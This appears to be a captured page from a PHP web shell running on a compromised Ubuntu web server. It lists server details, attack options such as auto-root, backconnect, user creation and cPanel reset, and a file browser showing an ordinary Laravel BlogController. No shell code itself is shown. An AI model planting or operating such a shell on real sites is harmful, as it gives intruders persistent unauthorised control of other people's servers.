Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.114.232
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
justhub /
source /
app /
Http /
Controllers /
[ HOME SHELL ]
Name
Size
Permission
Action
Client
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
BlogController.php
2.11
KB
-rw-r--r--
ClientsController.php
17.33
KB
-rw-r--r--
Controller.php
361
B
-rw-r--r--
ExportController.php
3.53
KB
-rw-r--r--
HomeController.php
76.48
KB
-rw-r--r--
LoginController.php
1.65
KB
-rw-r--r--
MailController.php
1.88
KB
-rw-r--r--
OrderController.php
25.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : BlogController.php
<?php namespace App\Http\Controllers; use App\Models\Blog; use App\Models\BlogSlider; use App\Models\Page; use App\Models\SocialMediaLink; use Illuminate\Http\Request; class BlogController extends Controller { // public function index(){ $page_detail=Page::wherePageUrl('blog')->first(); $blog_sliders =BlogSlider::all(); $blogs=Blog::select('*')->orderBy('id','desc')->paginate(16); $latest_blogs=Blog::orderBy('id','desc')->limit(3)->get(); $social_links=SocialMediaLink::first(); return view('blogs',[ 'meta_title'=>$page_detail->page_meta_title, 'meta_description'=>$page_detail->page_meta_keywords_description, 'meta_keywords'=>$page_detail->page_meta_keywords, 'page_detail'=>$page_detail, 'blogs'=>$blogs, 'is_index'=>1, 'seo_html'=>'', 'latest_blogs'=>$latest_blogs, 'social_links'=>$social_links, 'blog_sliders'=>$blog_sliders, ]); } public function post($slug){ $post=Blog::whereSlug($slug)->first(); if($post){ $blog_sliders =BlogSlider::all(); $blogs=Blog::select('*')->paginate(16); $latest_blogs=Blog::orderBy('id','desc')->limit(3)->get(); $social_links=SocialMediaLink::first(); if($post->id==155){ $is_index= 0; }else{ $is_index=1; } return view('post',[ 'post'=>$post, 'latest_blogs'=>$latest_blogs, 'social_links'=>$social_links, 'blog_sliders'=>$blog_sliders, 'meta_title'=>$post->meta_title, 'fb_image'=>asset("assets/blog-posts/".$post->featured_image), 'tw_image'=>asset("assets/blog-posts/".$post->featured_image), 'seo_html'=>$post->seo_html, 'is_index'=>$is_index, 'meta_description'=>$post->meta_descriptions, 'meta_keywords'=>$post->meta_keywords]); }else{ abort(404); } } }
Close